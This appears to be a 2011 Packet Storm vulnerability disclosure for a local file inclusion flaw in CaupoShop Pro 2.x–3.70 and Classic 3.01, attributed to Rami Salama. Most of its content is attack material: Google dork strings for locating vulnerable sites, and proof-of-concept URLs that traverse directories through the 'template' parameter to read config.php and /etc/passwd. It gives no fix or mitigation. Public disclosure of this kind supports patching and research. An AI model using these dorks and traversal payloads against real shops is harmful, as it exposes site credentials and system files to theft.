CaupoShop Pro / Classic Local File Inclusion

2011-11-03T00:00:00
ID PACKETSTORM:106568
Type packetstorm
Reporter Rami Salama
Modified 2011-11-03T00:00:00

Description

                                        
                                            `CaupoShop Pro (2.x/ <= 3.70) Local File Include Vulnerability  
-----------------------------------------------------------------------------------------  
# Vuln Softwares : CaupoShop Pro 2.x  
CaupoShop Classic 3.01  
CaupoShop Pro 3.70  
# Discovered By : Rami Salama  
#Contact : eng.ramisalama_[at]_gmail_[dot]_com  
# Vendor : http://www.caupo.net  
# Greets To : All my colleagues and friends in MCIT scholarship at Raya Academy  
#Dorks : "powered by CaupoShop"  
inurl:index.php?action=template&template  
  
#Exploit : http://127.0.0.1/[CaupoShop]/index.php?action=template&template=[LFI]  
#POC : http://127.0.0.1/[CaupoShop]/index.php?action=template&template=../../../config.php  
http://127.0.0.1/[CaupoShop]/index.php?action=template&template=../../../../../../etc/passwd  
  
#28 October 2011 - Egypt  
  
`